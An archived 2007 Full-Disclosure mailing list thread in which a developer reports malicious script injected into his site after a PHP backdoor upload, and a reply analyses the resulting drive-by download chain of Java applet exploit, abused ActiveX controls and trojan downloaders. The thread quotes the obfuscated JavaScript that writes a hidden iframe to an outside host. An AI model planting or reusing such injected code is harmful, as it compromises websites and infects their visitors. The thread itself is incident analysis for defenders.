| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 4 Jan 2007 15:25:50 -0800
From: Andrew Farmer <andfarm@...il.com>
To: "Ian Shaw" <useraddr@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: any idea what is going on here?
On 04 Jan 07, at 13:37, Ian Shaw wrote:
> A website that I am developing has had BackDoor-CUS!php uploaded to
> the images directory. My faulty entirely due to permissions set.
>
> This has resulted in
>
> <html>
> <script language="javascript">
> s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%
> 2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%
> 67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%
> 48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%
> 47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%
> 44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F
> %22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%
> 53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
> document.writeln(s);document.close();
> </script>
> </html>
>
> being added to the top of index.php.
>
> Unencoded this reads
>
> iframe src=" http://www.nownames.org/images/in.php?adv=3"
> WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0"
> SCROLLING="auto" frameborder="0" NORESIZE>
>
> When I go to this an applet appear to run but I am not sure what
> doing. Closed my browser out of fear.
>
> Does anyone know what it is attempting to do?
The iframe source loads an obfuscated Javascript which, when decoded,
loads a Java applet and subsequently attempts several exploits.
I have disassembled the Java applet. It contains some obfuscation of
its own, defining classes at runtime from inline byte arrays. It
appears to exploit the Microsoft Java VM by overloading
SecurityClassLoader at runtime.
One is against a number of ActiveX plugins which implement
CreateObject or GetObject methods which may be used to create a
WScriptShell. The class IDs of the plugins in question are:
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43c8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44f9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496b-B050-6C07C962476B}
If such an plugin is found, the script loads and runs a small Windows
executable. I have not fully analyzed this executable, but it appears
to be a downloader which is not identified by Kapersky. It loads a
third executable in MS-DOS format from another site. None of my tools
can disassemble this, but Kapersky identifies it as Trojan-
Downloader.Win32.Small.avw: *another* loader.
Following this, the decrypted script contains part of another
exploit. The exploit is truncated, so I'm not sure exactly what it's
targeting. There's a lot of Unicode shellcode escaping going on, but
the final "attack" is missing. This may be due to a bug in the
decryption routine.
All files are available on request, if anyone's interested in doing
some further analysis of their own.
That was fun :)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists